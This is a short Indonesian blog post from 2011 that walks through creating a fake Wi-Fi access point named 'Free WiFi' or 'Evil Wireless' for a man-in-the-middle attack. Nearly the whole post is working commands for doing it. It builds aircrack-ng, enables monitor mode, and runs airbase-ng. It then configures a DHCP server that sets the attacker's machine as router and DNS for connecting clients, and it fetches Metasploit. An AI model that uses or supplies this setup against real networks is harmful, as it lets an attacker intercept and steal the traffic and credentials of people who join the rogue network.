0
comments
|
1/15/11
Versi Singkat membuat Fake AP
root@bt#airbase-ng -e "Free WiFi" -P -C 30 -v wlan0Versi lengkap untuk MiTM attack
Siapkan software yang di butuhkansudo apt-get install subversion
Summary perintah yang digunakan
svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng cd aircrack-ng/ make make install
sudo su - airmon-ng start wlan0 airbase-ng -e "Evil Wireless" -v mon0 & ifconfig at0 10.0.0.1 netmask 255.255.255.0
#apt-get install dhcp3-server #vim /etc/dhcp3/evil-wireless.conf
option domain-name-servers 10.0.0.1; default-lease-time 60; max-lease-time 72; ddns-update-style none; authoritative; log-facility local7; subnet 10.0.0.0 netmask 255.255.255.0 { range 10.0.0.100 10.0.0.254; option routers 10.0.0.1; option domain-name-servers 10.0.0.1; }
# dhcpd3 -cf /etc/dhcp3/evil-wireless.conf
#ifconfig mon0 mtu 1800 #ifconfig at0 mtu 1400
#svn co http://metasploit.com/svn/framework3/trunk msf3 (butuh waktu lama & bandwidth)
jadi bersabar ya... :-O
Labels: backtrack
0 Comments:
Post a Comment
<< Home